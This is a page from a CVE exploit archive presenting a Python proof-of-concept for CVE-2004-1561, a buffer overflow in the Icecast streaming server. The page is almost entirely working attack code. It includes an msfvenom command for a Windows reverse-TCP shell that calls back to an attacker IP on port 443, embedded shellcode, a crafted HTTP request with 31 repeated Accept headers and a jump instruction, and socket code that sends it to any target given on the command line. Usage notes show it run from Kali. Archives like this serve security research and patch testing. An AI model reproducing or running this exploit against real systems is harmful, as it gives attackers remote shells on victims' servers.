4837 Total CVEs
26 Years
GitHub
Home / 2004 / CVE-2004-1561
README.md
Rendering markdown...
POC / icecast.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3
##############################################################################################
# How to use:
# 1. Replace 'buf' shellcode below with msfvenom shellcode
# 2. Call it like this: ./icecast.py <target> <port>
# Eg. root@Kali:~# ./icecast.py 192.168.92.133 8000
##############################################################################################
import socket
import sys

host = sys.argv[1] # Receive IP from user
port = int(sys.argv[2]) # Receive Port from user

# Replace with own shellcode here
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.92.128 LPORT=443 -f python -b '\x00\x0a\x0d'

buf =  ""
buf += "\xd9\xc5\xd9\x74\x24\xf4\xba\xc4\x81\xbb\x95\x5e\x31"
buf += "\xc9\xb1\x52\x31\x56\x17\x03\x56\x17\x83\x2a\x7d\x59"
buf += "\x60\x4e\x96\x1c\x8b\xae\x67\x41\x05\x4b\x56\x41\x71"
buf += "\x18\xc9\x71\xf1\x4c\xe6\xfa\x57\x64\x7d\x8e\x7f\x8b"
buf += "\x36\x25\xa6\xa2\xc7\x16\x9a\xa5\x4b\x65\xcf\x05\x75"
buf += "\xa6\x02\x44\xb2\xdb\xef\x14\x6b\x97\x42\x88\x18\xed"
buf += "\x5e\x23\x52\xe3\xe6\xd0\x23\x02\xc6\x47\x3f\x5d\xc8"
buf += "\x66\xec\xd5\x41\x70\xf1\xd0\x18\x0b\xc1\xaf\x9a\xdd"
buf += "\x1b\x4f\x30\x20\x94\xa2\x48\x65\x13\x5d\x3f\x9f\x67"
buf += "\xe0\x38\x64\x15\x3e\xcc\x7e\xbd\xb5\x76\x5a\x3f\x19"
buf += "\xe0\x29\x33\xd6\x66\x75\x50\xe9\xab\x0e\x6c\x62\x4a"
buf += "\xc0\xe4\x30\x69\xc4\xad\xe3\x10\x5d\x08\x45\x2c\xbd"
buf += "\xf3\x3a\x88\xb6\x1e\x2e\xa1\x95\x76\x83\x88\x25\x87"
buf += "\x8b\x9b\x56\xb5\x14\x30\xf0\xf5\xdd\x9e\x07\xf9\xf7"
buf += "\x67\x97\x04\xf8\x97\xbe\xc2\xac\xc7\xa8\xe3\xcc\x83"
buf += "\x28\x0b\x19\x03\x78\xa3\xf2\xe4\x28\x03\xa3\x8c\x22"
buf += "\x8c\x9c\xad\x4d\x46\xb5\x44\xb4\x01\x7a\x30\xea\x51"
buf += "\x12\x43\x12\x53\x58\xca\xf4\x39\x8e\x9b\xaf\xd5\x37"
buf += "\x86\x3b\x47\xb7\x1c\x46\x47\x33\x93\xb7\x06\xb4\xde"
buf += "\xab\xff\x34\x95\x91\x56\x4a\x03\xbd\x35\xd9\xc8\x3d"
buf += "\x33\xc2\x46\x6a\x14\x34\x9f\xfe\x88\x6f\x09\x1c\x51"
buf += "\xe9\x72\xa4\x8e\xca\x7d\x25\x42\x76\x5a\x35\x9a\x77"
buf += "\xe6\x61\x72\x2e\xb0\xdf\x34\x98\x72\x89\xee\x77\xdd"
buf += "\x5d\x76\xb4\xde\x1b\x77\x91\xa8\xc3\xc6\x4c\xed\xfc"
buf += "\xe7\x18\xf9\x85\x15\xb9\x06\x5c\x9e\xc9\x4c\xfc\xb7"
buf += "\x41\x09\x95\x85\x0f\xaa\x40\xc9\x29\x29\x60\xb2\xcd"
buf += "\x31\x01\xb7\x8a\xf5\xfa\xc5\x83\x93\xfc\x7a\xa3\xb1"

evul = "\xeb\x0c" + " / HTTP/1.1 " + buf + "\r\n" + "Accept: text/html\r\n"*31
evul += "\xff\x64\x24\x04" + "\r\n\r\n"  # jmp [esp+4] 

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)	# Declare a TCP socket
client.connect((host,port))                               #Connect to TCP socket
client.sendall(evul.encode('latin-1'))	                                # Send buffer overflow
client.close()

print("\nDone!")